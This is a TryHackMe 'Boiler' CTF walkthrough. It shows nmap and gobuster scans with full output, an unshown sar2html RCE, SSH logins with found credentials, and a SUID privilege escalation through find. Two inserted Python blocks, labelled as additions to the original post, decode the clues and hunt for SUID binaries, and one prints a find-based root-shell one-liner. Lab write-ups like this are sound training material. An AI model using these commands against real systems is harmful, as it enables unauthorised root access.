Boiler CTF - TryHackMe Walkthrough

Arrow
7 min read, Dec 20, 2020

Hi everyone!
I am back for another TryHackMe Walkthrough.
Our CTF this time is Boiler, a medium-difficulty machine. Its tags already give a few clues about what to expect, so we can count on dealing with some FTP, SSH and Webmin.

Boiler CTF Room.

So, now that we are all fired up (or rather boiled, xD), let’s jump into it.

Let’s start with some enumeration, shall we?
So, here is my first attempt to enumerate the machine.

root@ip-10-10-22-172:~# nmap -sV -sC 10.10.73.89

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-19 11:51 GMT
Nmap scan report for ip-10-10-73-89.eu-west-1.compute.internal (10.10.73.89)
Host is up (0.0038s latency).
Not shown: 997 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.22.172
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
MAC Address: 02:8D:36:E8:02:47 (Unknown)
Service Info: OS: Unix

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 38.97 seconds

The first thing that caught my attention was the anonymous FTP.
“Sweet”, I thought, but it turned out I was heading straight down a rabbit hole.
Let me explain.
As soon as I connected to the FTP server, I came across the following .txt file.

Anonymous FTP.

Does this format ring any bells? After dealing with many of these on the Biohazard CTF, I instantly thought this must be ROT13. I was not mistaken, but the smile on my face went away the second I decoded it.

ROT13 Anonymous FTP decoding.

It seems that the creator is going to play some cat and mouse game with us. Ok, challenge accepted!
Back to the Nmap results: we have an Apache server on port 80 and Webmin on port 10000. I quickly headed to the Webmin port just to verify that there is a login page. We should probably go looking for some credentials.

Webmin Login.

But before that, let’s do a little more enumeration and crawl the web server.

root@ip-10-10-22-172:~# gobuster dir -u http://10.10.73.89 -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -x php,txt,tar
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.73.89
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Extensions:     php,txt,tar
[+] Timeout:        10s
===============================================================
2020/12/19 12:32:23 Starting gobuster
===============================================================
/manual (Status: 301)
/robots.txt (Status: 200)
/joomla (Status: 301)

Oh, a robots.txt! It seems that we might have a little something here.

robots.txt

It looks like we have a round of decimal (ASCII byte values) followed by a round of base64, which reveals a 32-character hex string that looks like an MD5 hash.

CyberChef robot.txt decoding.

However, it seems like we were tricked again!

kidding!
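The two decoding steps above, the ROT13 note from the FTP server and the decimal-then-base64 chain from robots.txt, as an added Python example that is not part of the original post. The sample inputs are constructed for this example and are not the real files from the Boiler box; the hash-length table goes a little beyond the page by also recognising SHA-1 and SHA-256 sized digests.

```python
import base64
import codecs
import re
from typing import Optional, Tuple

# Constructed sample inputs for this example; they are NOT the real note and
# robots.txt from the Boiler box, only data in the same shape.
SAMPLE_FTP_NOTE = "Guvf vf whfg n qrpbl, xrrc rahzrengvat."
SAMPLE_ROBOTS_NUMBERS = (
    "77 68 69 121 77 122 81 49 78 106 99 52 79 87 70 105 89 50 82 108 90 106 "
    "65 120 77 106 77 48 78 84 89 51 79 68 108 104 89 109 78 107 90 87 89 61"
)

# Hex-digest lengths of the hash types CTF authors most often plant.
HASH_LENGTHS = {32: "MD5 (or NTLM)", 40: "SHA-1", 64: "SHA-256"}


def rot13(text: str) -> str:
    """ROT13 is its own inverse, so one call both encodes and decodes."""
    return codecs.decode(text, "rot_13")


def decimal_to_bytes(blob: str) -> bytes:
    """Parse a whitespace-separated list of decimal byte values."""
    values = [int(tok) for tok in blob.split()]
    if any(not 0 <= v <= 255 for v in values):
        raise ValueError("value outside 0..255: not a decimal byte list")
    return bytes(values)


def b64_decode_lenient(data: bytes) -> bytes:
    """Base64-decode, restoring '=' padding that copy/paste often drops."""
    data = data.strip()
    data += b"=" * (-len(data) % 4)
    return base64.b64decode(data, validate=True)


def classify_hash(candidate: str) -> Optional[str]:
    """Guess the hash type from a bare hex string by its length, else None."""
    if re.fullmatch(r"[0-9a-fA-F]+", candidate):
        return HASH_LENGTHS.get(len(candidate))
    return None


def decode_robots_chain(blob: str) -> Tuple[str, Optional[str]]:
    """decimal -> base64 -> text, then report whether the text looks like a digest."""
    text = b64_decode_lenient(decimal_to_bytes(blob)).decode("ascii")
    return text, classify_hash(text)


if __name__ == "__main__":
    print("FTP note  :", rot13(SAMPLE_FTP_NOTE))
    text, kind = decode_robots_chain(SAMPLE_ROBOTS_NUMBERS)
    print("robots.txt:", text, "->", kind or "not a bare hex digest")
```

A 32-character hex string only looks like MD5; nothing in the encoding proves which algorithm produced it, so the next step is a lookup or a hashcat run, and, as the page shows, the plaintext may turn out to be just another taunt.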

Moving to the /joomla directory, I found yet another login page. Let’s crawl once more, this time from that directory onwards. A lot of directories popped up, but the ones I found a little out of the ordinary were the following.

gobuster joomla enumeration.

I am not going to go through all of it, but I had a really hard time with the creator’s trolling. After a while, I landed on /joomla/_test, a SAR2HTML page. The first thing that came to mind was to download the .tar file from the welcome page in case there was something of use in it, and that is how I found its version.

SAR2HTML version.

A quick search on exploit-db showed that this specific version is vulnerable to a pretty easy RCE.
Playing around with the RCE a little, I found credentials for an SSH user. However, when I tried them out, they did not work.

SSH user.

With all those rabbit holes I was confused for quite a while, but then I remembered that there was no SSH port in the Nmap scan performed earlier. That scan only covered Nmap’s default set of the 1,000 most common ports, so an SSH daemon on a high port would simply not have shown up. Could it be running on another port, or is this one more trick?
Let’s find out with a second Nmap scan, this time over all 65,535 ports.

root@ip-10-10-22-172:~# nmap -T4 -A -p- 10.10.73.89

Starting Nmap 7.60 ( https://nmap.org ) at 2020-12-19 13:28 GMT
Warning: 10.10.73.89 giving up on port because retransmission cap hit (6).
Nmap scan report for ip-10-10-73-89.eu-west-1.compute.internal (10.10.73.89)
Host is up (0.0012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
21/tcp    open  ftp     vsftpd 3.0.3
|_ftp-anon: Anonymous FTP login allowed (FTP code 230)
| ftp-syst:
|   STAT:
| FTP server status:
|      Connected to ::ffff:10.10.22.172
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 5
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
80/tcp    open  http    Apache httpd 2.4.18 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
10000/tcp open  http    MiniServ 1.930 (Webmin httpd)
|_http-server-header: MiniServ/1.930
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
55007/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 e3:ab:e1:39:2d:95:eb:13:55:16:d6:ce:8d:f9:11:e5 (RSA)
|   256 ae:de:f2:bb:b7:8a:00:70:20:74:56:76:25:c0:df:38 (ECDSA)
|_  256 25:25:83:f2:a7:75:8a:a0:46:b2:12:70:04:68:5c:cb (EdDSA)
MAC Address: 02:8D:36:E8:02:47 (Unknown)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3.13
OS details: Linux 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.21 ms ip-10-10-73-89.eu-west-1.compute.internal (10.10.73.89)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1225.45 seconds

Bingo! There is an SSH service running on port 55007! This time we managed to log in with the credentials found before, and not long after we got our hands on a second user’s credentials through the backup.sh file.

User basterd SSH.

As I could not find anything else of interest, I switched to the stoner user. There, we were welcomed with some more trolling, of course.

User stoner SSH.

Let’s see if we are lucky enough to find a SUID misconfiguration. For those who want a more detailed description of the topic, there are some excellent resources here and here.

Root escalation.

From the list above, we can see that there is a variety of things we could try. After a while of searching on GTFOBins and some trial and error, /usr/bin/find was the one that gave us the key to the root user.
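The SUID hunt described in the two paragraphs above, as an added Python example that is not from the original post: it mirrors the usual `find / -perm -4000 -type f 2>/dev/null` sweep, walks the filesystem and splits the hits into names that GTFOBins documents with a SUID escalation and everything else. The GTFOBINS_SUID set is a hand-picked subset chosen for illustration, not the full GTFOBins list, so every hit should still be checked against GTFOBins itself. The demo() function builds a constructed temporary directory so the block runs without a vulnerable box; the walk over "/" in __main__ is what you would run on the target.

```python
import os
import stat
import tempfile
from typing import Dict, List

# Subset of binaries GTFOBins documents with a SUID escalation path.
# Assumption for this example: a basename match is enough for a first pass.
GTFOBINS_SUID = {
    "find", "vim", "nmap", "python", "python2", "python3", "perl", "bash",
    "env", "less", "more", "awk", "cp", "mv", "nano", "xxd", "tar", "zip",
}

# Pseudo-filesystems with no real SUID binaries that only slow the walk down.
SKIP_DIRS = {"/proc", "/sys", "/dev", "/run", "/snap"}

# GTFOBins one-liner for a SUID find: -p keeps the elevated effective uid,
# which bash would otherwise drop on startup.
FIND_TO_ROOT = "find . -exec /bin/sh -p \\; -quit"


def is_suid(path: str) -> bool:
    """Mirror of `find -perm -4000 -type f`: a regular file with the SUID bit."""
    try:
        st = os.lstat(path)
    except OSError:
        return False
    return stat.S_ISREG(st.st_mode) and bool(st.st_mode & stat.S_ISUID)


def find_suid(root: str) -> List[str]:
    """Walk root and collect SUID regular files; unreadable dirs are skipped."""
    hits = []
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames[:] = [d for d in dirnames
                       if os.path.join(dirpath, d) not in SKIP_DIRS]
        for name in filenames:
            path = os.path.join(dirpath, name)
            if is_suid(path):
                hits.append(path)
    return sorted(hits)


def triage(paths: List[str]) -> Dict[str, List[str]]:
    """Split hits by basename: known GTFOBins entries vs. everything else.
    The 'review' bucket (custom or unusual SUID binaries) often matters more."""
    result: Dict[str, List[str]] = {"gtfobins": [], "review": []}
    for path in paths:
        bucket = "gtfobins" if os.path.basename(path) in GTFOBINS_SUID else "review"
        result[bucket].append(path)
    return result


def demo() -> Dict[str, List[str]]:
    """Constructed sample tree: a SUID 'find', a SUID 'custombin', a plain 'ls'.
    Returns basenames so the result does not depend on the temp dir path."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, mode in (("find", 0o4755), ("custombin", 0o4755), ("ls", 0o755)):
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)  # setting the SUID bit on your own file needs no root
        buckets = triage(find_suid(tmp))
        return {k: [os.path.basename(p) for p in v] for k, v in buckets.items()}


if __name__ == "__main__":
    print("constructed sample:", demo())
    for bucket, paths in triage(find_suid("/")).items():
        print(bucket, paths)
    print("if find is SUID, try:", FIND_TO_ROOT)
```

On a real box the interesting part is usually the "review" bucket: a stock Ubuntu install has a predictable set of SUID binaries (passwd, sudo, mount and friends), so anything outside that set, or a common tool like find that normally is not SUID, is where to look first.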

Thoughts on the Boiler CTF

I cannot describe how much I enjoyed this one.
I really appreciated the creator’s effort to put rabbit holes here and there, although they were a little annoying at times.
This is a good lesson that constantly reminds us that the key is to keep enumerating until we make it.
I highly recommend checking out Boiler CTF yourselves; you will not be disappointed!

I hope you enjoyed this walkthrough!
Up until next time, stay safe and keep hacking! :)


Arrow

A humble sysadmin, cybersecurity freak, metalhead and crazy cat lady.